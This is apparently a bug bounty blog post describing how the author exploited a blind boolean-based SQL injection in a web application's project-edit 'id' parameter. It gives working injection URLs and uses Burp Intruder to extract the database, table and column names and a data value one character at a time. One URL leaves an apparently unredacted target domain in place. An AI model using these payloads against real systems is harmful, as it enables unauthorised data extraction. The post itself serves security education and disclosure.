A Straight 5-hour Escalation! Exploiting Boolean-Based SQL Injection.👽

Hi, Ajak Amico’s welcome back to another blog today. I will explain how I exploited Boolean-Based SQLI, which took me about 5 hours of straight. Before starting, if you haven’t subscribed to our channel, do subscribe, guys. Contents related to cyber security, Bug Bounty, and Digital Forensics Investigation.👇

Follow our Youtube Channel: @ajakcybersecurity (321Videos)

Follow on Instagram: @ajakcybersecurity

What was My recon process?

So Basically, Before doing active and passive recon on a target, I will just analyze the Target, how it works, how it has been designed, what technology has been implemented, and What features have been implemented, and that was the same case here too!

So I was just crawling and Analyzing the site to make sure what the site was all about!

So I just found a tab called Project as follows:

When You edit the project again, you will get a parameter like this:

https://redacted.com/projects/projects-edit.html?id=879

So Simply, I gave an error with a single colon (‘)

https://redacted.com/projects/projects-edit.html?id=879'

It showed a 500 status code internal domain error

so Next I was Tring to balance the query to get the 200 responses back! Balanced Query:

https://redacted.com/projects/projects-edit.html?id=879 -- -

Ok! So Now I just stopped my recon and started to work on exploiting the SQLI, Because P1 Flaws are always special and there is a high chance that it will get a duplicate Too!

How I Exploited the Blind Boolean-Based SQL Injection?

First, I tried with Union-based SQLI, but the site redirected me to its main page, Next, I tried with Blind boolean-based SQLI, and hopefully, it worked!👍

If the given query is False, it will show a 301 status code; if the query is TRUE, it will give us 200 responses (Throughout the exploitation)

Confirming Blind Boolean-based SQLI:

False Query:

https://redacted.com/projects/projects-edit.html?id=879 AND 1=2 - -

True Query:

https://redacted.com/projects/projects-edit.html?id=879 AND 1=1 - -

So Using Wappalyzer, I found out that the backend server was using MYSQL and found out that the URL was vulnerable to blind boolean-based SQLI!

Retrieve length of database Name:

ok! It’s Time to get the database Name! So First, I started to check the length of the database name as follows:

FALSE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND(length(database(0,1)))=1 -- -

So the above Query will check whether the database length is equal to 1 if it is True, it will return a 200 response if FALSE will return a 301 response!

TRUE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND(length(database(0,1)))=12 -- -

So I found that the length of the database name is 12 Characters!

Retrieving strings of the database name:

Next, we are going to get the strings of the database one by one, for this we will be Using an ASCII table to find the ASCII value of each string

So basically, we will be getting the strings through the ASCII values.

Finding the first letter of the database name:

Now capture the following URL in the intruder tab, set positions and payloads, and start the attack!

FALSE QUERY:

https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),1,1)))=97   -- -

TRUE QUERY:

https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),1,1)))=121   -- -

so the intruder tab will check them from 97 to 125. When it finds the correct String, It will show us a 200 response if not, it will throw a 301 response

The first letter in database!

“You can see the 200 response comes in 121'st payload which means the ASCII value of 121 is the first letter of the Database, checking the ASCII table -121, The first letter in the database name is “y”

Now Second letter!

FALSE query:

https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),2,1))) = 100 -- -

TRUE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND(ascii(substr((select database()),2,1))) = 111 -- -

The same Intruder process will be applied here, too when it finds the correct String, It will show us a 200 response if not, it will throw a 301 response

The second letter in the database name

“You can see the 200 response comes in 111'th payload which means the ASCII value of 111 is the second letter of the Database, checking the ASCII table -111, The Second letter in the database name is “o”

so by using this method I was able to take all the 12 characters!

(121-y)
(111-o)
(117-u)
(114 -r)
( 98 -b)
(117 -u)
(115 -s)
(105 -i)
(110 -n)
(101 -e)
(115 -s)
(115 -s)

the database name was “yourbusiness”

Retrieving tables:

First, we are going to see the length of the table for that, we will use the following query:

FALSE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND (length((select table_name from information_schema.tables where table_schema="yourbusiness" limit 0,1))) = 1  -- -

TRUE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND (length((select table_name from information_schema.tables where table_schema="yourbusiness" limit 0,1))) = 7 -- -

So the above Query will check whether the TABLE length is equal to 1 if it is True, it will return a 200 response if FALSE will return a 301 response!

Length of the Table

Just to confirm! Similarly, enumerating fourth table information using the following query to test the condition of whether the length of string for the fourth table is equal to True or false!

TRUE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND (length((select table_name from information_schema.tables where table_schema=database() limit 4,1))) = 18 -- -

Retrieving table strings:

Using the same method where we used to get the database name will be used here too! Give the following Query and send it to the intruder tab, set positions, set payloads, and start the attack!

TRUE Query:

https://redacted.com/projects/projects-edit.html?id=879 AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="yourbusiness" LIMIT 0,1),1,1))) = 97 -- -

The first letter in Table

so according to ASCCI, value 97 holds the value “a”, which means the first letter in the table is “a”

Retrieving Second letter in Table:

True Query:

https://redacted.com/projects/projects-edit.html?id=879 AND (ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="yourbusiness" LIMIT 0,1),2,1))) = 100 -- -

The second letter in the table!

so according to ASCCI value, 100 holds the value “d”, which means the first letter in the table is “d”

so by using this method, I took all the 7 characters!

(97- a)
(100- d)
(100- d)
(114- r)
(101- e)
(115- s)
(115- s)

The table name was “address”

Retrieving Columns of the database

So, as usual make sure what will be the length of the column

https://biztool.ro/projects/projects-edit.html?id=879 AND (length((select column_name from information_schema.COLUMNS where table_schema=database() limit 0,1))) = 5 -- -

The column was a 5-letter digit, Using the same above intruder method, I was able to get the column name also. First letter query for retrieving column name is as follows:

True Query:

https://redacted.com/projects/projects-edit.html?id=879 AND (ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="address" LIMIT 0,1),1,1))) = 112 -- -

So by this method, I was able to get the column name also:

(112- p)
(108- l)
(97- a)
(99- c)
(101- e)

The column name was “Place”

Finally, Retrieving data!

Generally, The small letter of the ASCCI value starts with 97(a) and ends at 122(z), so Assuming that I used the same Above intruder method to get the data Surprisingly, it showed 500 responses! This means the first letter of the data doesn’t fall under the small letter.

So I started to check with a capital letter, and Hopefully, it was a YES! The first letter was in the capital(Uppercase).

The first letter in the data

So the first Letter was “S” Using this method, I got all the data Too! It was as follows:

(83-S) (caps)
(116-t)
(114-r)
(97-a)
(100-d)
(97 -a)
(32- space)
(83-S) (caps)
(116-t)
(114-r)
(101-e)
(101-e)
(116-t)

It was “Strada Street”

Gotcha! This was enough to prepare a Good report For the company 😉

Yes! It took me 5hours Straight, yet it was Completely Interesting and a bit hard to Exploit this SQLI! 😁

Bug bounty tips:

Before doing recon on the site, Just analyze the site, what the site is all about and what features have been implemented. High chances you will get Business Logic Flaws!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Hope you have learned some information from this blog if so, kindly press the follow button for further updates.

Best wishes from Ajak Cybersecurity.❤️

“கற்றவை பற்றவை🔥”

Learn Everyday, Happy Hacking 😁🙌

https://www.buymeacoffee.com/Ajak

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Follow our YouTube Channel: @ajakcybersecurity

Follow on Instagram: @ajakcybersecurity